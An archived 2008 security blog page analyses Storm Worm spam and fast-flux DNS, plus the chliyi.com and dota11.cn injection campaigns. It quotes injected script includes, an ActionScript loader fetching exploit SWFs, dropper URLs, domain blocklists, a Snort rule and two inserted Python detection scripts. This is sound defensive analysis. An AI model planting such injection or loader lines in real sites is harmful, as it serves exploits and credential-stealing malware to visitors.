sudosecure.net

is anything truly secure…

Archive for May, 2008

Storm Worm is back and SPAM is flowing.

Posted by jeremy on 30th May 2008

It looks like the Storm Worm authors have finally got their DNS issues worked out and have started repairing the overall botnet structure. I wonder how much money is lost when a spam-sending botnet the size of the Storm Worm is down for longer than a few days? I would bet it is a lot. Anyway, it looks like the Storm Worm Web servers do not have an index page defined yet, but I bet that this configuration is short lived. I was only able to grab these files or pages from a Storm Worm server during my testing: ind.php, load.php, sony.exe, loveyou.exe, and iloveyou.exe. The iloveyou.exe and loveyou.exe are identical binaries with the same md5sums, and here are their VirusTotal results. The load.php and sony.exe are also identical binaries, and here are their VirusTotal results. According to the VirusTotal statistics it looks like about 50% of the antivirus companies are detecting these binaries at this time. Running these binaries in my sandnet shows they are still using the herjek.exe and herjek.config file names and are located in the Windows directory (%windir%). Here is a list of the 815 peers I was able to extract: peers_list.txt.

Some of the more interesting findings in my tests this afternoon had to do with the spam the Storm Worm was trying to send out. All of the spam being sent out right now is using subdomain names for only a few unique domain names. The following are the unique domain names I was able to extract from my sandnet SMTP mail server:

  • catsharp.com
  • lowsmell.com
  • picturewest.com
  • posestory.com
  • pressrose.com
  • producemorning.com

Here are a few of the subdomain names I saw:

  • aayxyi.catsharp.com
  • acknl.pressrose.com
  • acz.picturewest.com
  • ad.producemorning.com
  • adru.picturewest.com
  • aegi.lowsmell.com
  • aegirl.pressrose.com
  • aemw.picturewest.com
  • afpirl.picturewest.com

A full list of the subdomain names I was able to identify can be found here: smtp_sites subdomains. Obviously these subdomains are randomly generated, and the Storm DNS servers have wildcards to accept requests for any subdomain of the few domain names I listed above. All of these domains and subdomains seem to point you to the Canadian Pharmacy site I spoke about in my last Storm Worm posting. This time, though, it looks like even the SPAM domains are using Fast Flux technology to rotate their IP addresses from a list of 20 IPs that is also rotated about every two minutes. This will definitely prevent IP blocks from being effective, so if you have any type of DNS blackholing or blacklists I would suggest you add these domains to those lists now. All of the SPAM was focused on pharmaceuticals, which is fairly normal for the Storm Worm. Here is a list of the unique subject lines I saw in my sandnet: smtp_subjects.txt.
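As an added example that is not part of the original post, the following Python groups the advertised URLs by base domain, flags base domains that show up under several distinct subdomains (the wildcard pattern described above), and emits RPZ-style records that blackhole the base and every subdomain at the resolver. The sample messages, the two-label base-domain rule and the min_hosts threshold are assumptions.

```python
import re
from collections import defaultdict

# Accepts live http(s):// links as well as the defanged hxxp:// form used on this page.
_URL_HOST_RE = re.compile(r"\bh(?:tt|xx)ps?://([A-Za-z0-9.-]+)", re.IGNORECASE)

# Constructed sample: one line per spam message, built from subdomains the post lists
# plus one legitimate link that must not be flagged.
SAMPLE_SPAM_BODIES = [
    "Cheap meds today! hxxp://aayxyi.catsharp.com/",
    "Best prices: hxxp://acknl.pressrose.com/index.html",
    "Visit hxxp://acz.picturewest.com/ now",
    "Visit hxxp://adru.picturewest.com/ now",
    "Visit hxxp://aemw.picturewest.com/ now",
    "Visit hxxp://afpirl.picturewest.com/ now",
    "Special offer hxxp://aegirl.pressrose.com/",
    "Your weekly newsletter: https://www.example.com/news",
]


def base_domain(host, labels=2):
    """Registrable domain by a fixed label count.

    Assumption: two labels are enough for the .com names seen here; a
    public-suffix list is needed for suffixes such as co.uk.
    """
    parts = host.lower().rstrip(".").split(".")
    return ".".join(parts[-labels:])


def hosts_by_base(bodies):
    """Map each base domain to the set of distinct hostnames advertised under it."""
    groups = defaultdict(set)
    for body in bodies:
        for host in _URL_HOST_RE.findall(body):
            groups[base_domain(host)].add(host.lower())
    return groups


def wildcard_candidates(groups, min_hosts=2):
    """Base domains advertised through several distinct (random-looking) subdomains.

    Blocking individual subdomains is pointless when the authoritative server
    answers for any label, so the base domain is the unit to act on.
    """
    return sorted(base for base, hosts in groups.items() if len(hosts) >= min_hosts)


def rpz_records(bases):
    """Response Policy Zone records that return NXDOMAIN for the base and all subdomains."""
    lines = []
    for base in bases:
        lines.append(f"{base} CNAME .")
        lines.append(f"*.{base} CNAME .")
    return lines


def main():
    groups = hosts_by_base(SAMPLE_SPAM_BODIES)
    for base, hosts in sorted(groups.items()):
        print(f"{base}: {len(hosts)} distinct hostname(s)")
    for line in rpz_records(wildcard_candidates(groups)):
        print(line)


if __name__ == "__main__":
    main()
```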

One last note of interest for everyone that emailed me about the Storm Binary Tracker being down. My outage was due to the Storm Worm having intermittent issues, but since these issues are over my Storm Binary Tracker is now back up and running. Happy Malware Hunting!

Posted in Bots and Worms, Storm Worm | No Comments »

Malicious Site Analysis for chliyi.com injection

Posted by jeremy on 29th May 2008

According to my Google searching, chliyi.com has successfully been injected onto about 12,000 sites. This malicious domain is using the well-publicized Adobe Flash vulnerability along with a few others. The good news is that Symantec ThreatCon has retracted its declaration of this being a 0-day exploit, and has since clarified, with the help of Adobe, that this exploit does not work on the newest version of the Flash Player, 9.0.124.0. This site is not very complex in structure, as the following site map demonstrates:

As you can see, the entry page for this injection is chliyi.com/reg.js, using the following code:

<script src=hxxp://www.chliyi.com/reg.js>

hxxp://www.chliyi.com/reg.js

This file contains no obfuscation, but it does contain some interesting logic, as you can see.

Obviously if you are using the Chinese language pack you won't receive any of the malicious code, so I would assume the authors want to avoid exploiting Chinese clients. With that, I also believe that this round of injections was most likely performed by a Chinese organization.

hxxp://www.chliyi.com/img/info.htm

This page is where the obfuscation starts. It also starts the decision tree for choosing which exploits to serve to a user being directed to this malicious domain. The first obfuscation is done with VBScript and looks like this:

My first deobfuscation revealed even more VBScript obfuscation, which can be seen here:

After the second deobfuscation we see the first portion of the decision tree for choosing which exploits to send to the user's computer. The first test tries to create an Adobe.Stream object with the clsid:BD96C556-65A3-11D0-983A-00C04FC29E36 classid, which would identify a browser that is possibly susceptible to the MS06-014 vulnerability. If the creation is successful, the next page the user is directed to is the help.htm page; if it is unsuccessful, the user is sent over to a series of exploits, including the highly publicized Flash Player exploit.

hxxp://www.chliyi.com/img/help.htm

The help.htm file is obfuscated with VBScript as well, but definitely not as complicated. The obfuscated page looked like this:

Deobfuscated, it is very clear what vulnerability the authors are targeting. The MS06-014 vulnerability is an older vulnerability, but it must still have a very good success rate, as lots of malicious code is still targeting it. It was only last month that the famous MPack toolkit stopped including it, so, as everyone has said before me, keep your systems patched to stop old vulnerabilities like this one from being exploited on your systems.

If the exploit is successful the user will download the hxxp://www.jj120.net/inc/fuckjp.exe binary. VirusTotal results for this are fair, with 22/32 (68.75%), and can be seen here: VirusTotal Results. Running this Trojan in my lab, it grabbed two more files, FLoader.exe and WLoader.exe, which from my analysis are World of Warcraft account credential stealers. Their respective VirusTotal results can be found here: FLoader Results and WLoader.exe Results. Obviously the gaming industry offers something valuable for the site authors. Lately I have started to see a lot more of these types of Trojans, where specific account information is being stolen for gaming sites instead of the normal email and bank info stealers.

hxxp://www.chliyi.com/img/flash.swf

This is obviously the Flash Player exploit getting so much attention in the last few days. Most of the other sites using this exploit embed ActionScript that directs you to load different Flash files, with exploits chosen based on your browser. For example, most sites separate the Firefox file from the IE file, but this one is not as sophisticated and serves only one Flash media file. The swfdump decompile looks like this:

A code extraction attempt using flare showed this:

I am fairly new at deobfuscating Flash files, but what I did notice is that there is no ActionScript associated with the exploit. You can read the security bulletin posted by Adobe for more information, and if you happen to run across the toolkit or actual exploit documentation feel free to send it my way. ;) Also, here are the VirusTotal results for Flash.swf.

hxxp://www.chliyi.com/img/real.htm

This is another VBScript-obfuscated page, but this time targeting the Real Player vulnerability (CVE-2007-5601). This is just another example of why system administrators need to pay attention to software updates outside the normal Microsoft Windows and Microsoft Office updates published once a month. The deobfuscation process took two VBScript deobfuscations to display the actual JavaScript-rendered exploit seen here:

I didn't include the obfuscated code snapshots, as they were actually very large files with too many lines to take screen shots that would display properly in this post. If you need them I can send them your way or post them up for download, just ask.

hxxp://www.chliyi.com/img/new.htm

The new.htm file is another attempt at exploiting a known vulnerability in Real Player (CVE-2008-1309). This deobfuscation took two VBScript decodes to render the following code:

Obviously none of the exploits being served up by this malicious domain are 0-days, so if you just keep your systems up to date and exercise a little bit of caution when surfing the internet you should be OK. One obvious plugin I would highly recommend is the NoScript plugin for Firefox, as it will definitely aid in stopping these scripts from executing without your permission. I would also suggest filtering the domain names seen in this analysis, chliyi.com and jj120.net, at the very minimum if you have that capability. Another option would be to block the IPs associated with these domains, chliyi.com (218.30.96.87) and jj120.net (61.142.250.221), but this sometimes leads to legitimate sites being blocked, as they could be on a shared host. I checked all the A and CNAME records associated with those IPs and didn't see anything that looked legitimate or popular. I would rather block now and apologize later, but this is definitely not the corporate standard.

I also wasn't surprised at all to see who the registrars for these two hostile domains were as they seem to be very popular with the Malware writing community lately.

Domain Name: CHLIYI.COM
Registrar: BEIJING INNOVATIVE LINKAGE TECHNOLOGY LTD. DBA DNS.COM.CN
Whois Server: whois.dns.com.cn
Referral URL: http://www.dns.com.cn
Name Server: DNS21.HICHINA.COM
Name Server: DNS22.HICHINA.COM
Status: ok
Updated Date: 24-jan-2008
Creation Date: 12-jun-2003
Expiration Date: 12-jun-2008

Domain Name: JJ120.NET
Registrar: XIN NET TECHNOLOGY CORPORATION
Whois Server: whois.paycenter.com.cn
Referral URL: http://www.xinnet.com
Name Server: NS1.72DNS.COM
Name Server: NS2.72DNS.COM
Status: clientDeleteProhibited
Status: clientTransferProhibited
Status: clientUpdateProhibited
Updated Date: 09-mar-2008
Creation Date: 07-mar-2006
Expiration Date: 07-mar-2009

As always if you have any questions or comments feel free to contact me or leave them here.

Posted in Malicious Domain | 1 Comment »

Malicious Site Analysis for dota11.cn injection

Posted by jeremy on 27th May 2008

SQL and XSS site injections have become a standard for spreading malicious code and binaries lately. This is my analysis of the dota11.cn injection that just recently occurred. My goal in doing this analysis is to provide a visual picture into how these types of injections work and the methodologies behind them. First off here is a Site Map for the current mappings of the dota11.cn injection:

As you can see from the Site Map, these types of injections serve as the gateways to a much larger schema of user tracking, malicious code, and exploit-serving web pages and/or scripts. Now let me attempt to walk you through the logic for this schema.

hxxp://www.dota11.cn/m.js

This is the entry page for this injection. The following is the actual code injected into a vulnerable web site:

<script src=hxxp://www.dota11.cn/m.js>

A simple script src= will automatically include the malicious code from the above URL, which is why it is injected into the vulnerable web site in the first place. The m.js file contains a simple JavaScript that is used to non-intrusively redirect you to a statistics-gathering server. This will allow the malicious designer of this schema to track users, system configurations, and traffic flows as you are involuntarily redirected through this maze of hostile content. The statistics-gathering server is located here: web.51.la/go.asp. The other portion of the m.js file contains simple logic to render one of two iframe redirections based on your browser's language settings. If you have the Chinese language pack configured you will be directed to windows.loveyoushipin.com/ing/le.htm, and if you don't have it configured you will be directed to www.dota11.cn/dj.htm. The last and final portion of the m.js script will direct you via an iframe to www.woai117.cn/123.htm. You can view the original m.js source code here in PDF format: M.js Source Code.
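The chliyi.com reg.js and dota11.cn m.js injections above both ride on a single external script or iframe include. As an added example (not code from the posts or from either injection), the following Python scans an HTML page for script and iframe src values, including the unquoted form the injections use, and flags hosts under the domains named in these two write-ups as well as zero-size or hidden iframes. The sample page, the blocklist set and the two-label suffix match are assumptions.

```python
import re
from urllib.parse import urlparse

# Hostile domains named in the chliyi.com and dota11.cn write-ups on this page.
HOSTILE_DOMAINS = {"chliyi.com", "jj120.net", "dota11.cn", "woai117.cn", "loveyoushipin.com"}

_TAG_RE = re.compile(r"<(script|iframe)\b([^>]*)>", re.IGNORECASE)
# src= with double quotes, single quotes, or no quotes at all
# (the injected <script src=hxxp://www.dota11.cn/m.js> form).
_SRC_RE = re.compile(r"\bsrc\s*=\s*(?:\"([^\"]*)\"|'([^']*)'|([^\s>]+))", re.IGNORECASE)
_HIDDEN_RE = re.compile(
    r"\b(?:width|height)\s*=\s*[\"']?0\b|display\s*:\s*none|visibility\s*:\s*hidden",
    re.IGNORECASE,
)

# Constructed sample: an ordinary page with the injection and a hidden iframe added.
SAMPLE_PAGE = """<html><head><title>Constructed sample page</title>
<script src=hxxp://www.dota11.cn/m.js></script>
<script src="/js/site.js"></script>
</head><body>
<iframe src="hxxp://windows.loveyoushipin.com/ing/le.htm" width=0 height=0></iframe>
<iframe src="https://www.example.com/embed"></iframe>
</body></html>"""


def blocklisted_parent(host, blocklist=HOSTILE_DOMAINS):
    """Return the blocklisted domain that host equals or sits under, else None.

    Suffix matching is what catches throwaway hosts such as
    windows.loveyoushipin.com without listing every label.
    """
    labels = host.lower().rstrip(".").split(".")
    for i in range(len(labels) - 1):
        candidate = ".".join(labels[i:])
        if candidate in blocklist:
            return candidate
    return None


def host_of(url):
    """Hostname from a URL; defanged hxxp:// links parse the same as http://."""
    return (urlparse(url.strip()).hostname or "").lower()


def scan_html(html, blocklist=HOSTILE_DOMAINS):
    """Return one finding per script/iframe whose src is hostile or which is hidden."""
    findings = []
    for tag_match in _TAG_RE.finditer(html):
        tag, attrs = tag_match.group(1).lower(), tag_match.group(2)
        src = _SRC_RE.search(attrs)
        if not src:
            continue  # inline script or srcless iframe: nothing to resolve
        url = src.group(1) or src.group(2) or src.group(3) or ""
        host = host_of(url)
        reasons = []
        listed = blocklisted_parent(host, blocklist) if host else None
        if listed:
            reasons.append(f"src host under blocklisted domain {listed}")
        if tag == "iframe" and _HIDDEN_RE.search(attrs):
            reasons.append("hidden iframe")
        if reasons:
            findings.append({"tag": tag, "url": url, "host": host, "reasons": reasons})
    return findings


def main():
    for finding in scan_html(SAMPLE_PAGE):
        print(f"<{finding['tag']}> {finding['url']}: {'; '.join(finding['reasons'])}")


if __name__ == "__main__":
    main()
```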

hxxp://windows.loveyoushipin.com/ing/le.htm

You will only receive this iframe redirection if your browser is configured to use the Chinese language pack. The le.htm file will attempt to serve a Real Player exploit (CVE-2007-5601) to you; more information on this vulnerability can be found here: Vulnerability Summary CVE-2007-5601. The other portion of this script will covertly redirect you to a short JavaScript at hxxp://js.users.51.la/1662569.js, which is the configuration-gathering script that will submit your information to the statistics-gathering web server: vip2.51.la/go.asp. Strategically placing these statistics-gathering scripts allows the malicious site designer to track their logic flows and exploit attempts to gauge how successful his or her design is. You can view the original le.htm and 1662569.js source code here in PDF format: 1662569_js Source Code and le_htm Source Code.

hxxp://www.dota11.cn/dj.htm

You will receive this iframe redirection if your browser is not configured to use the Chinese language pack. This file appears to be the most complex piece of this malicious schema, with several logically chosen exploits being served up, and it is obfuscated to prevent detection and deter analysis. The first attempt at serving up malicious content is targeted at an old vulnerability in the Microsoft Data Access Components (MDAC) function (MS06-014). If your configuration doesn't throw an error on the creation of the Adobe.Stream object, you will be iframe redirected to hxxp://www.dota11.cn/14.htm, where the malicious binary bak.exe will be downloaded to your computer from hxxp://www.woai117.cn/bak.exe via the MDAC vulnerability being exploited. If your configuration throws an error, a Real Player vulnerability will be probed for. Here is the vulnerability summary information: CVE-2007-5601; it is the same vulnerability that was seen in the le.htm file earlier. If this probe does not throw an error you will be redirected to hxxp://www.dota11.cn/rl.htm, where an attempt will be made to exploit this vulnerability. If the above Real Player vulnerability probe fails and throws an error, you will be iframe redirected to hxxp://www.dota11.cn/new.htm, where you will receive another attempt at exploiting a more recent Real Player vulnerability (CVE-2008-1309). You will also be redirected to hxxp://www.dota11.cn/04.htm, which looks like a left-behind iframe reference that the designer forgot to clean up. I say this because I received a 404 error when I tried grabbing this file. The last iframe redirection occurs no matter what the above logic dictated and will lead you to hxxp://www.dota11.cn/123.htm. Here is the source code for the files mentioned in this paragraph: dj_htm Source Code, 14_htm Source Code, rl_htm Source Code, and new_htm Source Code. The decoded version of dj.htm can be seen here: dj_htm_decoded Source Code. VirusTotal bak.exe Results.

hxxp://www.dota11.cn/123.htm and hxxp://www.woai117.cn/123.htm

These two files, although hosted on separate domains, contain the exact same content. Both of them serve up malicious Flash media files. If you're using Internet Explorer you will receive this video: hxxp://www.woai117.cn/4561.swf, and for all others you will receive this video: hxxp://www.woai117.cn/4562.swf. Both of these utilize some embedded ActionScript logic to redirect you to a malicious Flash media file based on your Flash player version. For Internet Explorer users the redirect looks like this: hxxp://www.woai117.cn/ + fVersion + i.swf, and for all others it looks like this: hxxp://www.woai117.cn/ + fVersion + f.swf. The following excerpt is from the ActionScript being used:

movie '4561.swf' {
// flash 8, total frames: 1, frame rate: 12 fps, 550x400 px, compressed
  frame 1 {
    var fVersion = /:$version;
    loadMovie('hxxp://www.woai117.cn/' + fVersion + 'i.swf', _root);
    stop();
  }
}

This looks like the same vulnerabilities SANS.org is referencing in Adobe Flash Player Vuln and Malicious swf files.

If you have any questions or comments regarding this posting as always feel free to contact me. I hope you enjoyed the change from the normal Storm Worm coverage. Thanks for visiting.

Posted in Malicious Domain | 1 Comment »

Storm DNS Servers not answering

Posted by jeremy on 26th May 2008

Currently the Storm Worm domain name servers are not responding to DNS queries for the known Storm Worm domain names. The Fast Flux DNS magic the Storm Worm utilizes has been one of the key factors in its past success, so I would think this is a short-lived outage. Currently all of the live Storm Worm domain names I am aware of are pointing to the following DNS servers:

  • ns.likenewvideos.com
  • ns2.likenewvideos.com
  • ns3.likenewvideos.com
  • ns4.likenewvideos.com

The oddity of this outage is that the above name servers are rotating their A records with no issues, but none of them have any A records to serve up for the Storm Worm Web Servers. Here are a few examples of my dig query outputs:

;; ANSWER SECTION:
ns.likenewvideos.com. 70381 IN A 76.174.44.224

;; AUTHORITY SECTION:
likenewvideos.com. 70381 IN NS ns4.likenewvideos.com.
likenewvideos.com. 70381 IN NS ns.likenewvideos.com.
likenewvideos.com. 70381 IN NS ns2.likenewvideos.com.
likenewvideos.com. 70381 IN NS ns3.likenewvideos.com.

;; ADDITIONAL SECTION:
ns2.likenewvideos.com. 70381 IN A 209.159.249.102
ns3.likenewvideos.com. 70381 IN A 117.123.100.162
ns4.likenewvideos.com. 70381 IN A 213.211.109.179

;; ANSWER SECTION:
ns2.likenewvideos.com. 150897 IN A 76.90.237.129

;; AUTHORITY SECTION:
likenewvideos.com. 150897 IN NS ns4.likenewvideos.com.
likenewvideos.com. 150897 IN NS ns.likenewvideos.com.
likenewvideos.com. 150897 IN NS ns2.likenewvideos.com.
likenewvideos.com. 150897 IN NS ns3.likenewvideos.com.

;; ADDITIONAL SECTION:
ns.likenewvideos.com. 150897 IN A 69.249.236.201
ns3.likenewvideos.com. 150897 IN A 70.121.44.74
ns4.likenewvideos.com. 150897 IN A 209.159.249.102

;; AUTHORITY SECTION:
likenewvideos.com. 70125 IN NS ns2.likenewvideos.com.
likenewvideos.com. 70125 IN NS ns3.likenewvideos.com.
likenewvideos.com. 70125 IN NS ns4.likenewvideos.com.
likenewvideos.com. 70125 IN NS ns.likenewvideos.com.

;; ADDITIONAL SECTION:
ns.likenewvideos.com. 70125 IN A 76.174.44.224
ns2.likenewvideos.com. 70125 IN A 209.159.249.102
ns4.likenewvideos.com. 70125 IN A 213.211.109.179

;; ANSWER SECTION:
ns4.likenewvideos.com. 150781 IN A 209.159.249.102

;; AUTHORITY SECTION:
likenewvideos.com. 150781 IN NS ns3.likenewvideos.com.
likenewvideos.com. 150781 IN NS ns4.likenewvideos.com.
likenewvideos.com. 150781 IN NS ns.likenewvideos.com.
likenewvideos.com. 150781 IN NS ns2.likenewvideos.com.

;; ADDITIONAL SECTION:
ns.likenewvideos.com. 150781 IN A 69.249.236.201
ns2.likenewvideos.com. 150781 IN A 76.90.237.129
ns3.likenewvideos.com. 150781 IN A 70.121.44.74

It also looks like an outage has surfaced in the Storm Spam being sent out. I ran a sample for over 3 hours in my sandnet with not one single SMTP packet being sent out, so the good news is this outage may eliminate a few spam messages in my inbox tomorrow morning.

It also looks like my p2p list in the herjek.config file is shrinking slowly, with only 778 IPs in it right now. Here is the decoded herjek.config peer list: Storm Peer IP List.

I don't really think this outage will last longer than 24 hours, and would be surprised if it is still occurring when I get up in the morning. This is more than likely down time for an update, or maybe even some type of configuration changes being conducted by the Storm Worm Authors. Look for something new from them real soon!

UPDATE: I am now starting to see the Storm Worm DNS servers and Web servers recover, but it now seems as if the entire Storm Worm network is experiencing intermittent availability. Again, I don't believe this is something permanent; it is more than likely intermittent outages as the Storm Worm Authors get their updates and/or changes out.

Posted in Bots and Worms, Storm Worm | 3 Comments »

Storm Worm Slowing Down (maybe) but still Spamming

Posted by jeremy on 23rd May 2008

In the last 24 to 48 hours I have seen a tremendous slow down in the number of Storm Worm web server IPs being rotated through the Fast Flux network. I usually average about 8,000 to 10,000 unique IPs a day using some custom scripts to query the Storm Worm DNS servers, but for the last 24 hours I have only seen 223 unique IPs. I am not sure why this has occurred; it may just be an unintentional hiccup. Although, in the past, when I have identified hiccups in the Storm network it has always been on the eve of a change. This may very well be an indicator that change is on the horizon, since this is Memorial Day weekend here in the United States. Here is a list of the 223 Storm Web Serving IPs I have seen in the last 24 hours: Storm Web Server Unique IPs.

Since I saw this tremendous reduction in Storm Web Servers I figured I would check to see if there were any reductions in the number of peers currently stored in the herjek.config file. Although this is not a good overall indicator of how many bots are in the Storm Worm network, I still thought I would check. I did not see any obvious reduction, with 850 IPs being maintained in my sandnet run for a little over an hour. Here is a list of the peers from this run: Storm Peer List.

I have just recently started looking deeper into the Spam sent out by the Storm Worm and I have identified a few interesting characteristics. I captured a total of 2,524 Spam messages during the same one-hour sandnet run I mentioned earlier in this posting. Out of the 2,524 Spam messages there were exactly 853 unique Subject lines, all pertaining to pharmaceuticals, mostly focused on male enhancement and Viagra. Here is a file with all of the unique subject lines I saw: Storm SMTP Subject Lines. Another interesting observation is that out of all these Spam messages there were only 9 different domain names being advertised. These domain names were:

  1. catsharp.com
  2. followequate.com
  3. industrydictionary.com
  4. lowsmell.com
  5. picturewest.com
  6. posestory.com
  7. pressrose.com
  8. printlength.com
  9. producemorning.com

All of which resolved to IP address 220.162.247.222, which seems to be a Canadian Pharmacy website advertised as the #1 online drug store. In their FAQ they claim that all physicians are US licensed, using only board-certified physicians and U.S.-licensed pharmacies. They also state all of their products are manufactured and shipped from India and approved by the INDIAN FDA for export. I got a real laugh when I saw this Canadian Pharmaceutical company actually advertising an Anti-Spam policy. Here are a few direct quotes from this policy:

Canadian Pharmacy supports ONLY permission-based email management practices. In this regard, Canadian Pharmacy has implemented various policies and procedures that:

  • Help prevent Canadian Pharmacy from being used for the purpose of unsolicited email campaigns.
  • Encourage permission-based marketing.
  • Respond to all complaints suggesting Canadian Pharmacy has been used as a vehicle to send unsolicited email.

You may not use the Canadian Pharmacy or the products or services provided through or in connection with the Canadian Pharmacy to: a. send unsolicited bulk email, for commercial or non-commercial purposes. Unsolicited bulk email is defined as email sent to more than 10 individuals without their permission."

Canadian Pharmacy takes permission marketing very seriously. Thank you for reviewing our Anti-Spam Policy.

Another interesting item on this site is their privacy policy. Here are a few of the humorous lines I found in this policy:

Use of Your Email Information
Canadian Pharmacy is not an email list rental service and does not rent or sell any email addresses or other contact information that you provide.

E-mail and Direct Response Contact
All of our direct response methods are opt-in. If you subscribed to our e-mail newsletter(s) but do not want to receive it in the future, please follow the "unsubscribe" instructions contained in the newsletter(s)

Well, that is odd, as I seem to have just parsed through a few thousand Spam messages generated from the Storm Bot that all pointed to them. I guess policies like these help them seem like a more legit website/company that is actively taking action against unsolicited spam. Just to see what would happen I went ahead and posted a message in their contact us form. I guess they don't appreciate spam either, as they are employing a captcha to limit the comment spam bots. They also publish the following email address as their customer support email address: support@canadianmedicationsupport.com. Too bad there are no MX or A records being advertised for this domain, so emails will definitely have a difficult time getting to them.

Using passive DNS discovery techniques I was able to identify a few more IP addresses and Domain Names associated with this devious pharmaceutical supplier:

methodproduce.com A 220.162.247.222
pressrose.com A 220.162.247.222
followequate.com A 220.162.247.222
producemorning.com A 220.162.247.222
printlength.com A 220.162.247.222
lowsmell.com A 220.162.247.222
ns3.adverdomain.com A 220.162.247.222
catsharp.com A 220.162.247.222
gladcoat.com A 220.162.247.222
wyd.gladcoat.com A 220.162.247.222
picturewest.com A 220.162.247.222
industrydictionary.com A 220.162.247.222
posestory.com A 220.162.247.222
viagrabest.info A 220.162.247.222
www.viagrabest.info CNAME viagrabest.info

catsharp.com A 61.253.105.133
catsharp.com A 79.135.167.4
catsharp.com A 116.123.47.80
catsharp.com A 220.162.247.222
catsharp.com NS ns2.xinnet.cn
catsharp.com NS ns.xinnet.cn
catsharp.com NS ns1.qw22.com
catsharp.com NS ns2.qw22.com
catsharp.com NS ns3.qw22.com
catsharp.com NS ns4.qw22.com
catsharp.com NS ns2.xinnetdns.com
catsharp.com NS ns.xinnetdns.com

Looks like they have been doing this for some time now, based off all of the IPs and Domain Names listed in the queries. I also noticed that all of these IPs seem to be using Virtual Host configurations, as visiting these sites strictly by IP will get you interesting messages like "It works!" and squid proxy messages. All of these sites are served by Nginx web servers. Nginx web servers seem to be a popular choice for phishing sites, malware-serving sites, and now pharmaceutical sites. I should also note the Storm Worm binary-serving web servers use this same web server. I won't bore you with whois query results, but I did find it interesting that "Wen Fang" seems to be the registrant for all of the domain names being used, along with a few hundred other domain names.

As always if you have any questions or comments regarding this information feel free to contact me anytime and have a nice Memorial Day Weekend!

Posted in Bots and Worms, Storm Worm | No Comments »

Storm revisits Social Engineering

Posted by jeremy on 19th May 2008

Looks like the Storm Worm authors are back to using good old-fashioned Social Engineering to infect unsuspecting users. Obviously this is nothing new for the Storm Worm, but for the last few weeks they have relied solely on iframe redirections combined with fancy JavaScript obfuscation serving up multiple exploits. My assumption would be that this new wave of Social Engineering is a result of the Storm Worm Botnet shrinking in size every day.

The new web page is simple and to the point with only the following message being displayed:

Your download should start automatically in a few seconds. If not, click here to start the download.

The page source code looks like this:

As you can see, there are two binaries being offered up by this page: "loveyou.exe" and "iloveyou.exe". If you click the hyperlink on this page you will download the "loveyou.exe" binary. If you just wait 5 seconds you will automatically download the "iloveyou.exe" binary via a meta tag refresh. This is of course very simple code in comparison to the "ind.php" JavaScript-obfuscated page, which, might I add, is still being offered up with multiple exploits to anyone visiting it.

This particular version of the Storm Worm creates a configuration file of peers in the %WINDIR% titled "totacon.config" and the actual Storm Worm binary file titled "totacon.exe". VirusTotal results at the time of this analysis were not very promising (6/32), and can be found here: VirusTotal results for iloveyou.exe and VirusTotal results for totacon.exe. Microsoft does seem to be on top of this, so they get an attaboy from me. Just for the fun of it I also ran the "iloveyou.exe" through the ThreatExpert Sandbox and ended up with these results: ThreatExpert Report iloveyou.exe.

I have decided to post a few of my results from my personal sandbox analysis conducted in my makeshift lab. First off, here is a list of the 804 IPs I was able to extract from the "totacon.config" file with my storm_config_decoder.pl script: Totacon Config Storm Peers. I also decided to grab some SMTP traffic by modifying Joe Stewart's Truman fauxsmtp.pl script, combined with my Perl DNS script, to safely collect the spam without my ISP going nuts and without running the risk of getting blacklisted. Here is that log file for your viewing pleasure: Storm Worm SMTP Log file. As you can see, the Storm Worm SPAM mails focus heavily on male enhancement pharmaceuticals, no surprise here. On a positive side note, all of the http references for this SPAM run instance are blank. I believe this is because the current Storm Worm Domain Names being utilized have had their A records removed, possibly because the Registrant may have taken action against them. Thanks Mark from http://spamtrackers.eu for this information, as I was initially caught a little off guard by my logs till I saw your comments.

I also went ahead and decrypted some of the eDonkey p2p traffic as a quick check to see if the "XOR" key had changed, but it had not. Here is a portion of the decrypted pcap for anyone that is curious to actually see what the Storm Worm p2p Botnet traffic looks like: Decrypted Storm Worm PCAP, and just for comparison here is the same pcap slice encrypted in its original form: Storm Worm Traffic Encrypted. Note you will need to utilize an eDonkey decoder to correctly decode the eDonkey protocol, such as the one built into Wireshark. In Wireshark it is as simple as opening the file, clicking the "Analyze" menu option, and then selecting the "Decode As" menu option from the drop-down. From there scroll down and select the eDonkey protocol using the SRC UDP port (24571) in this instance, and finally press the "OK" button. You should see several "Publicize" messages under the Info column now, which means you have succeeded at decoding the eDonkey protocol. ;)

As always, if you have any questions or comments feel free to shoot them my way. One last thing: I would like to go ahead and thank the professionals and gurus over at UploadMalware.com and MalwareDomainList.com, as many of them have actively collaborated and shared insightful information with me on this subject on a daily basis since I became a member. Your help is greatly appreciated!

UPDATE: I reported that the following Storm Worm Domain Names were no longer active: polkerdesign.cn, tellicolakerealty.cn, and cadeaux-avenue.cn. This information was inaccurate, as it was only the Storm Worm Name Servers that were taken action against, causing my queries to fail. The following Name Servers no longer resolve Storm Worm Domain Names, as connections seem to be refused: ns.orthelike.com, ns2.orthelike.com, ns3.orthelike.com, and ns4.orthelike.com.

Posted in Bots and Worms, Storm Worm | 4 Comments »

Storm Worm using a 2 stage attack system

Posted by jeremy on 6th May 2008

The Storm authors are starting to experiment with new and creative ways to ensure we can't track them easily, with their latest variant released earlier today. This recent change is actually fairly simple but at the same time fairly effective: only the stage one binary "load.php" (Storm's Trojan downloader) can grab the second stage binary "load2.php", which is the actual Storm Worm binary. They do this by filtering on User Agents. The Storm Trojan downloader's User Agent is "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1921)". Notice the "SV1921" portion, as it seems to be the only unique portion that separates this User Agent from the normal Internet Explorer 6 User Agent (the stock IE6 SP2 string ends in "SV1"). To be more specific, the actual Storm Worm binary can only be downloaded by an application using "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1921)" as its User Agent at this time. I tried several other common IE User Agents and multiple combinations/variants of the Storm Trojan downloader User Agent, and was unsuccessful at retrieving the binary. With that information I think it would be safe to create a Snort IDS signature looking just for this specific User Agent. I have submitted my findings over to Matt Jonkman at Emerging Threats to get his expert opinion on this. My suggestion would be an update of sid:2008077 to look like this:

alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET CURRENT_EVENTS Possible Storm Worm EXE Request (Trojan Downloader User Agent)"; flow:established,to_server; content:"|0d 0a|User-Agent\: Mozilla/4.0 (compatible\; MSIE 6.0\; Windows NT 5.1\; SV1921)|0d 0a|"; classtype:trojan-activity; reference:url,www.sudosecure.net/archives/67; sid:2008077; rev:6;)
